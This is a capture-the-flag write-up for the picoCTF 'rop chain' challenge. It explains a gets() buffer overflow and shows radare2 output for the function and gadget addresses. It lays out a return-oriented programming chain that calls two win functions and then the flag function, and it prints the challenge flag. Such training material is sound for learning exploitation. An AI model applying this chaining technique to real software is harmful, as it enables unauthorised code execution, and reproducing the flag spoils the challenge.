Skip to content

Latest commit

 

History

History
54 lines (39 loc) · 2.08 KB

File metadata and controls

54 lines (39 loc) · 2.08 KB

rop chain

Points: 350

Category

Binary Exploitation

Question

Can you exploit the following program and get the flag? You can findi the program in /problems/rop-chain_0_6cdbecac1c3aa2316425c7d44e6ddf9d on the shell server? Source.

Hint

Try and call the functions in the correct order!

Remember, you can always call main() again!

Solution

First we analyse the steps required to get the flag. It looks like we have to go to the flag function to get the flag. But a few criterias must be met first. win1, win2 and arg_check2 must be set to the correct values to print the flag. There is win_function1 and win_function2 which will allow us to set these values.

At the vuln function, it calls gets, which is known for it's issues with buffer overflow exploits. We use the De Brujin sequence and calculate the offset needed. In this case, it's 28 characters.

Now, we get the addresses of both win functions and the flag function.

[0x080484d0]> s @ sym.win_function1
0x80485cb
[0x080484d0]> s @ sym.win_function2
0x80485d8
[0x080484d0]> s @ sym.flag
0x804862b

Since win_function2 and flag functions both required arguments, we need a ROP gadget that pops and returns. Popping allows us to insert our own arguments inside. Then the addresses of the next function can be written, so when the program runs return, it jumps to our desired function.

To get such a gadget, we can use radare2.

[0x080484d0]> /R pop; ret;
...
...
0x08048804               c408  les ecx, [eax]
0x08048806                 5b  pop ebx
0x08048807                 c3  ret

We can select 0x08048806 as our address. It does not matter which register the value from the stack is popped to.

Now we just chain the address and get the flag. exploit = padding + win1_addr + win2_addr + pop_ret_gadget + arg_check1 + flag_addr + pop_ret_gadget + arg_check2

Working solution solve.py

Recommended reads: http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html#fn-7

Flag

picoCTF{rOp_aInT_5o_h4Rd_R1gHt_536d67d1}